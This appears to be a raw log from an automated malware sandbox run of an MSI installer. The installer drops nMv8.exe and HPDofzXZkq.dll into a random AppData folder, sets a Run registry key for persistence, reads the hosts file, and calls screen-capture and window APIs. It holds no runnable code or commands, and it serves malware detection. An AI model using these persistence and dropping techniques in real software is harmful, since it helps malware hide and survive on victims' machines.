Source: nMv8.exe	String found in binary or memory: application/vnd.adobe.air-application-installer-package+zip
Source: nMv8.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: nMv8.exe	String found in binary or memory: jp-ocr-b-add
Source: nMv8.exe	String found in binary or memory: jp-ocr-hand-add
Source: nMv8.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: nMv8.exe	String found in binary or memory: application/x-install-instructions
Source: nMv8.exe	String found in binary or memory: ISO_6937-2-add
Source: nMv8.exe	String found in binary or memory: application/vnd.groove-help

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C003I7GF0S8F920G600203.msi

Static file information: File size 3771904 > 1048576

Source:	Binary string: msiexec.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb3;> source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: msi.pdbwk source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.844988826.0000000000D16000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: nsi.pdb_ source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: webio.pdb6+ source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.851076892.00000000052E0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.845720418.0000000000D10000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.850878874.00000000052E1000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: C003I7GF0S8F920G600203.msi
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: normaliz.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: idndl.pdbE6 source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: msi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: wmswsock.pdb]6 source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.845443372.0000000000D1C000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000012.00000003.851076892.00000000052E0000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb%6 source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: fwpuclnt.pdb=6? source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: sxs.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb'; source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb5;0 source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbi source: C003I7GF0S8F920G600203.msi
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000012.00000003.850878874.00000000052E1000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000012.00000003.845720418.0000000000D10000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: version.pdbk6 source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000012.00000003.850878874.00000000052E1000.00000004.00000040.sdmp
Source:	Binary string: webio.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: idndl.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: msiexec.pdbk source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb); source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdbtj source: WerFault.exe, 00000012.00000003.851076892.00000000052E0000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.851076892.00000000052E0000.00000004.00000040.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: netapi32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: netapi32.pdb/6 source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.850878874.00000000052E1000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000012.00000003.845443372.0000000000D1C000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.851076892.00000000052E0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.851076892.00000000052E0000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000012.00000003.844988826.0000000000D16000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb?;* source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: comctl32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: netutils.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049D7484 push ecx; mov dword ptr [esp], eax	4_2_049D7485
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049DE4E8 push ecx; mov dword ptr [esp], eax	4_2_049DE4ED
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049DB68C push ecx; mov dword ptr [esp], edx	4_2_049DB68D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049DFFD8 push ecx; mov dword ptr [esp], edx	4_2_049DFFD9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049DFFF0 push ecx; mov dword ptr [esp], edx	4_2_049DFFF1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049DFFE4 push ecx; mov dword ptr [esp], edx	4_2_049DFFE5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049E072C push 049E07AFh; ret	4_2_049E07A7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049E0036 push ecx; mov dword ptr [esp], edx	4_2_049E0039
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049E005C push ecx; mov dword ptr [esp], edx	4_2_049E005D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049E007E push ecx; mov dword ptr [esp], edx	4_2_049E0081
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049E0188 push ecx; mov dword ptr [esp], edx	4_2_049E0189
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049DF9C0 push ecx; mov dword ptr [esp], edx	4_2_049DF9C1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049E0170 push ecx; mov dword ptr [esp], edx	4_2_049E0171
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A0838C push ecx; mov dword ptr [esp], edx	4_2_04A0838E
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0049D5E5 push ecx; ret	14_2_0049D5F8
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_004A97B8 push eax; ret	14_2_004A97D6
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0049D5E5 push ecx; ret	21_2_0049D5F8
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_04895488 push ecx; mov dword ptr [esp], edx	25_2_04895489
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_0491940C push ecx; mov dword ptr [esp], eax	25_2_0491940F
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_04891868 push ecx; mov dword ptr [esp], ecx	25_2_0489186C
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_047D89FC push ecx; mov dword ptr [esp], ecx	25_2_047D8A00
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_047DA1F8 push ecx; mov dword ptr [esp], ecx	25_2_047DA1FB
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_047F8AF8 push ecx; mov dword ptr [esp], edx	25_2_047F8AF9
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_047C4EB0 push ecx; mov dword ptr [esp], edx	25_2_047C4EB1
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_04890A54 push ecx; mov dword ptr [esp], ecx	25_2_04890A59
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_047BD3F8 push ecx; mov dword ptr [esp], edx	25_2_047BD3F9
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_047EC394 push ecx; mov dword ptr [esp], edx	25_2_047EC396

Source: MSIA1C6.tmp.1.dr	Static PE information: section name: .didata
Source: HPDofzXZkq.dll.4.dr	Static PE information: section name: .didata

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_00450890 GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,_wcsncpy,_wcsrchr,WideCharToMultiByte,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,

14_2_00450890

Source: C:\Windows\SysWOW64\msiexec.exe

File created: C:\Users\user\AppData\Roaming\u0IjY7UrZ\Vk5OSNAZ1qGr0gp2STA6jj7mn

Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9ED5.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA1C6.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9FD0.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\u0IjY7UrZ\Vk5OSNAZ1qGr0gp2STA6jj7mn	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\u0IjY7UrZ\HPDofzXZkq.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9AEB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9D7C.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9ED5.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA1C6.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9FD0.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9AEB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9D7C.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run YSxeldR			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run YSxeldR			Jump to behavior

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00446070 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,_memset,EnumChildWindows,GetClassNameW,EnumChildWindows,	14_2_00446070
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0047FA60 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,	14_2_0047FA60
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0047FA00 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,	14_2_0047FA00
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00445220 SendMessageW,SendMessageW,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,	14_2_00445220
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00441BF0 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongW,GetModuleHandleW,GetProcAddress,	14_2_00441BF0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00482630 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop,	14_2_00482630
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00442F00 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,_free,GetPixel,ReleaseDC,	14_2_00442F00
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00443710 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_wcsrchr,__wcsicoll,__wcsicoll,__wcsicoll,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,__wcsnicmp,__fassign,__wcsnicmp,_wcsncpy,__fassign,__fassign,__fassign,__fassign,GetDC,DestroyIcon,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,_free,_free,_free,	14_2_00443710
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00446070 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,_memset,EnumChildWindows,GetClassNameW,EnumChildWindows,	21_2_00446070
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0046B140 GetWindowLongW,GetWindowLongW,GetWindowLongW,__wcsnicmp,__wcsnicmp,__wcsicoll,SetWindowPos,__wcsicoll,__wcsicoll,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,EnableWindow,__wcsnicmp,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,__wcsnicmp,MulDiv,MulDiv,__wcsnicmp,MulDiv,MulDiv,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcstoi64,IsWindow,SetParent,SetWindowLongW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,	21_2_0046B140
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00445220 SendMessageW,SendMessageW,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,	21_2_00445220
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_004723B0 SendMessageW,SendMessageW,SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageW,SendMessageW,ShowWindow,SetFocus,InvalidateRect,InvalidateRect,InvalidateRect,MapWindowPoints,InvalidateRect,	21_2_004723B0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0045B450 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,	21_2_0045B450
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_004824F0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,	21_2_004824F0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0046E510 SetWindowTextW,IsZoomed,IsIconic,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,GetForegroundWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,	21_2_0046E510
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0046E510 SetWindowTextW,IsZoomed,IsIconic,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,GetForegroundWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,	21_2_0046E510
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00482630 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop,	21_2_00482630
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00443710 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_wcsrchr,__wcsicoll,__wcsicoll,__wcsicoll,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,__wcsnicmp,__fassign,__wcsnicmp,_wcsncpy,__fassign,__fassign,__fassign,__fassign,GetDC,DestroyIcon,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,_free,_free,_free,	21_2_00443710
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_049CC2D0 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	25_2_049CC2D0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_049CC250 IsIconic,	25_2_049CC250

Source: C:\Windows\System32\msiexec.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
